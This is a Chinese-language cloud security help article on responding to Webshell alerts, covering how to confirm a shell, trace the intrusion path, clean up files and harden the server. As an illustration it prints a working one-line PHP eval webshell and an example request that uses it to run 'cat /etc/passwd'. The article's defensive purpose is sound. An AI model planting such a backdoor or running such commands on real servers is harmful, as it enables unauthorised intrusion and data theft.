Webshell处置最佳实践

本文涉及的产品
Web应用防火墙 3.0,每月20元额度 3个月
云安全中心漏洞修复资源包免费试用,100次1年
云安全中心 防病毒版,最高20核 3个月
简介: 适用场景在云安全中心告警中主机上检出Webshell时,如何处置,以及通过信息简要分析入侵途径。Web场景实战一、确认Webshell事件Webshell根据功能和大小,主要分为两类,一类是小马,一类是大马。Web小马主要以一句话木马居多,一句话木马一般是以执行代码的函数+可以自定义内容参数为主,黑...

适用场景

在云安全中心告警中主机上检出Webshell时,如何处置,以及通过信息简要分析入侵途径。image.png

场景实战

一、确认Webshell事件

Webshell根据功能和大小,主要分为两类,一类是小马,一类是大马。

小马主要以一句话木马居多,一句话木马一般是以执行代码的函数+可以自定义内容参数为主,黑客通过客户端配合,控制可执行命令函数的具体参数内容达到目的。

小马

例如:

PHP小马 a.php

<?php eval($_GET['pass']);?>

该小马通过取pass参数的值,再传入eval参数进行执行,来达到执行系统命令的目的。

例如:http://yoursite/a.php?pass=system('cat /etc/passwd'); ,即通过让php的system()函数执行了系统命令 。

image.png

大马

大马则包含常见完整的模块,例如命令执行,数据库连接,文件管理等等模块,一般会包含一个密码,通过浏览器访问即可完成各种后续动作。image.png

大马以及相关的变形文件,可以在一些github项目中非常容易找到,这里不做具体举例和分析。

通过以上特征加上对业务的了解,基本上可以确认是否被写入了Webshell。

二、判断Webshell来源

Webshell大多数情况下是因为Web应用存在漏洞,导致被利用进而植入Webshell。但也可能是主机运维通道弱口令,例如业务是通过ftp直接上传Web文件,但ftp弱口令或者空口令;其它还可能是ssh 弱口令,mysql弱口令等。

一般通过以下方法来判断来源和可能利用的漏洞:

  1. 判断Webshell文件的所有者,原理文件写入的进程会继承运行或者启动该进程的用户身份。例如下图a.php小马文件拥有者www用户,而www用户是Webserver和中间件的服务账号。由此可以判断该Shell是通过Web应用漏洞利用后写入。如果文件拥有者是ftp等其他服务账号,同理可推断写入途径。image.pngwww用户为nginx和php-fpm的服务账号image.png

  2. 根据Webshell路径推断漏洞模块

    1. 通常Webshell文件出现在站点的upload目录,image,file等存放用户上传文件的目录,一般是Web应用没有对上传文件内容或者类型进行检查或者限制。

    2. 如果Webshell文件出现在根目录或者其它无规律的目录,则可能是因为一些远程命令执行类的漏洞,结合云安全中心的风险管理-漏洞管理 中的应用漏洞或者应急漏洞扫描结果,看是否存在此类漏洞,基本可以判断。image.png

    3. 如果文件拥有者是root,mysql,或者其它可登录用户,则可能是因为弱口令被黑客爆破或者撞库非法登录,可以使用云安全中心 风险管理-基线检查 扫描一下看看是否存在弱口令。image.png

三、清理Webshell文件

  1. 如果Webshell是独立文件,可以手动删除或者直接通过云安全中心的告警处置,通过隔离动作进行处置image.png通过处置执行隔离image.png

  2. 如果是正常文件中被插入了恶意代码,则需要通过人工处置,手工删除文件中的恶意代码。这块需要对业务代码有一定了解,不做深入介绍。

四、安全加固

根据Webshell的植入来源,针对对应漏洞进行加固即可

  1. 该服务器对应有高危的漏洞,特别是远程命令执行,getshell的应用漏洞和应急漏洞要及时进行修复。在云安全中心 风险管理-漏洞管理 应用漏洞和应急漏洞中查看漏洞信息image.png

  2. 如果软件为第三方ISV进行开发,当前没有修复能力,可以使用对应的安全产品进行防护。Web应用类漏洞可以使用阿里云WAF接入进行漏洞防护:WAF相关的接入和配置可以参考:https://help.aliyun.com/document_detail/162902.html

  3. 如果是因为弱口令,在修改为更强密码的同时,建议评估该服务是否有必要开放在公网。若是ssh类运维通道,必须要开放在公网的,建议通过堡垒机登录,如果没有堡垒机,修改默认的服务端口也能在很大程度上避免网络上自动化爆破或者撞库工具。确认该服务器的暴露面,可以从云安全中心-资产暴露分析中查看image.png

相关文章
|
6月前
|
安全 网络安全 数据库
Web安全防护的必要性与漏洞扫描技术
随着互联网的发展,Web应用程序的使用越来越广泛,但也带来了越来越多的安全威胁。因此,Web安全防护变得越来越重要。本文将介绍Web安全防护的必要性,并详细介绍各种漏洞扫描技术,以帮助您保护Web应用程序的安全。
191 2
|
安全 网络协议 搜索推荐
应急靶场 | 2014-11-16流量分析练习
应急靶场 | 2014-11-16流量分析练习
255 1
|
1月前
|
存储 监控 网络安全
内网渗透测试基础——敏感数据的防护
内网渗透测试基础——敏感数据的防护
|
4月前
|
安全 前端开发 PHP
EdgeOne安全专项实践:上传文件漏洞攻击详解与防范措施
通过本文,我们深入探讨了文件上传漏洞攻击的多种案例和防范措施,以及在搭建攻击靶场时的实际操作。从前端和后端的校验漏洞,到利用Apache配置文件和文件包含漏洞的攻击方式,每一步都展示了安全防护的重要性。 在学习和实践过程中,我们不仅仅关注如何进行攻击,更着重于如何保护自己的服务器免受此类攻击。我们使用了EdgeOne作为一个解决方案的示例,展示了如何利用其提供的防护规则来有效防御文件上传漏洞。 无论是在靶场搭建过程中的细节操作,还是在攻击案例的分析过程中,安全意识和防护措施的实施都显得至关重要。通过本文,希望读者能够更深入地理解和应用这些安全原则,以保护自己的网络和服务器免受攻击的威胁。
|
5月前
|
SQL 安全 网络安全
漏洞扫描的主要功能是什么?
漏洞扫描工具识别并评估系统中的安全漏洞,包括发现缓冲区溢出、SQL注入等问题,进行漏洞分类、风险评估和生成报告。重要的是选择合适工具,设定扫描参数,定期更新规则,并与其他安全措施结合使用。定期扫描能降低被攻击风险,提升系统安全性。
漏洞扫描的主要功能是什么?
|
5月前
|
SQL 监控 中间件
【应急响应】拒绝服务&钓鱼指南&DDOS压力测试&邮件反制分析&应用日志
【应急响应】拒绝服务&钓鱼指南&DDOS压力测试&邮件反制分析&应用日志
|
6月前
|
PHP
【攻防世界】easyphp(PHP代码审计)
【攻防世界】easyphp(PHP代码审计)
|
6月前
|
安全 Java Shell
网络安全-webshell详解(原理、检测与防御)
网络安全-webshell详解(原理、检测与防御)
806 1
|
6月前
|
安全 网络安全 数据安全/隐私保护
探索Web安全:强化防护与漏洞扫描技术
在当今数字化时代,Web安全已经成为企业和个人必须关注的重要问题。本文将介绍Web安全的重要性,以及如何通过强化防护与漏洞扫描技术来保护网站和应用程序的安全。同时,还将探讨一些最新的Web安全威胁和应对策略,帮助读者更好地了解和应对Web安全挑战。
90 0
|
6月前
|
SQL 安全 网络安全
服务器入侵如何防护,业务被攻击如何处理,服务器安全防护方案
服务器入侵如何防护,业务被攻击如何处理,服务器安全防护方案